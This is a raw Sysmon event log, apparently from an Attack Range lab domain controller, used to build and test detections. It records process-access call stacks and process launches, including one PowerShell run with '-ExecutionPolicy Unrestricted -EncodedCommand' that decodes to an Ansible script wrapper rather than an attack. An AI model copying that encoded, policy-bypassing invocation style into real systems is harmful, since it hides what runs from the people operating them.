08:40:22.274{5D479F2C-1506-5F84-0C00-000000007E01}5721064C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F502-000000007E01}4592C:\Windows\system32\wbem\unsecapp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x80000000000000008Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:22.272{5D479F2C-1676-5F84-F502-000000007E01}4592C:\Windows\System32\wbem\unsecapp.exe10.0.14393.2515 (rs1_release_1.180830-1044)Sink to receive asynchronous callbacks for WMI client applicationMicrosoft® Windows® Operating SystemMicrosoft Corporationunsecapp.dllC:\Windows\system32\wbem\unsecapp.exe -EmbeddingC:\Windows\system32\NT AUTHORITY\SYSTEM{5D479F2C-1504-5F84-E703-000000000000}0x3e70SystemMD5=2E49BB6C9F6599F518FE30BE2F000247,SHA256=20F499D581CF4AF331D8EC8B1E07A32CC1A695EF6790B51DA5EE223C5867154F,IMPHASH=A3CC49DF67C2278F822C9EBB9908BF09{5D479F2C-1506-5F84-0C00-000000007E01}572C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 10341000x80000000000000007Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:22.258{5D479F2C-1506-5F84-0C00-000000007E01}5721064C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000006Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:22.258{5D479F2C-1504-5F84-0A00-000000007E01}8523044C:\Windows\system32\services.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\System32\RPCRT4.dll+112df|C:\Windows\system32\services.exe+18ff|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000005Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:22.243{5D479F2C-14FE-5F84-0500-000000007E01}6402464C:\Windows\system32\csrss.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000004Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:22.243{5D479F2C-1504-5F84-0A00-000000007E01}852940C:\Windows\system32\services.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\services.exe+12bee|C:\Windows\system32\services.exe+66f4|C:\Windows\system32\services.exe+5154|C:\Windows\system32\services.exe+d608|C:\Windows\system32\services.exe+4c6c|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x80000000000000003Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:22.227{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe12.0System activity monitorSysinternals SysmonSysinternals - www.sysinternals.com-C:\Windows\sysmon64.exeC:\Windows\system32\NT AUTHORITY\SYSTEM{5D479F2C-1504-5F84-E703-000000000000}0x3e70SystemMD5=0475D48604B7C8E7D9DD7605B6A5930F,SHA256=55BAD23D049A2FD801B8DECDC5D960D4E27D7F92541E8B37557B7495CA5561A2,IMPHASH=49AAA307415968B34D3FD1A72DEE6C71{5D479F2C-1504-5F84-0A00-000000007E01}852C:\Windows\System32\services.exeC:\Windows\system32\services.exe 434400x80000000000000002Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local2020-10-12 08:40:22.305Started12.04.40 16341600x80000000000000001Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local2020-10-12 08:40:22.211c:\Program Files\ansible\AttackRangeSysmon.xmlSHA1=662E68DD6B3360E156BDE1F54FD3ED5BB76E8AFC 10341000x8000000000000000128Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:23.790{5D479F2C-1677-5F84-F702-000000007E01}43642676C:\Windows\system32\conhost.exe{5D479F2C-1677-5F84-FB02-000000007E01}1500C:\Windows\system32\chcp.com0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000127Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:23.774{5D479F2C-1506-5F84-0C00-000000007E01}572596C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000126Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:23.774{5D479F2C-1506-5F84-0C00-000000007E01}572596C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000125Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:23.774{5D479F2C-1506-5F84-0C00-000000007E01}572596C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000124Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:23.774{5D479F2C-1506-5F84-0C00-000000007E01}572596C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000123Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:23.774{5D479F2C-1506-5F84-0C00-000000007E01}572596C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000122Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:23.774{5D479F2C-1506-5F84-0C00-000000007E01}572596C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000121Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:23.774{5D479F2C-1506-5F84-0C00-000000007E01}572596C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000120Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:23.774{5D479F2C-1506-5F84-0C00-000000007E01}572596C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000119Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:23.774{5D479F2C-14FE-5F84-0500-000000007E01}6401148C:\Windows\system32\csrss.exe{5D479F2C-1677-5F84-FB02-000000007E01}1500C:\Windows\system32\chcp.com0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x8000000000000000118Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:23.774{5D479F2C-1506-5F84-0C00-000000007E01}572596C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000117Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:23.774{5D479F2C-1677-5F84-FA02-000000007E01}46762348C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{5D479F2C-1677-5F84-FB02-000000007E01}1500C:\Windows\system32\chcp.com0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b5560|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\78b8fb2c58a4cdcc3a44547b9bbd80b9\System.ni.dll+2b4f07|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+366a32ad(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+35b44137(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+35b43e08(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+365f546d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+35b0499e(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+35b62e6d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+35b464d2(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+35b464d2(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+35b46363(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+35b382e8(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+35b4481b(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+35b4440e(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+35b44137(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+35b43e08(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+365f546d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+35b2ac69(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\bbcfce4d5e2ff289fc26db1642aedc89\System.Management.Automation.ni.dll+35b2a239(wow64) 154100x8000000000000000116Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:23.787{5D479F2C-1677-5F84-FB02-000000007E01}1500C:\Windows\System32\chcp.com10.0.14393.0 (rs1_release.160715-1616)Change CodePage UtilityMicrosoft® Windows® Operating SystemMicrosoft CorporationCHCP.COM"C:\Windows\system32\chcp.com" 65001C:\Users\Administrator\ATTACKRANGE\Administrator{5D479F2C-1677-5F84-B55C-110000000000}0x115cb50HighMD5=BA6FD5B883C0899785D17CEBE66A25F6,SHA256=9FDBDF88CF2BB2794C416E3083553F2898AC9DC92DFAC2478B4C1DF667DF7C74,IMPHASH=4FB30D6E330F3FB3DB61550BD7FA7CCD{5D479F2C-1677-5F84-FA02-000000007E01}4676C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA== 10341000x8000000000000000115Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:23.774{5D479F2C-1504-5F84-0B00-000000007E01}860664C:\Windows\system32\lsass.exe{5D479F2C-1507-5F84-1300-000000007E01}1308C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000114Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:23.774{5D479F2C-1504-5F84-0B00-000000007E01}860664C:\Windows\system32\lsass.exe{5D479F2C-1507-5F84-1300-000000007E01}1308C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000113Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 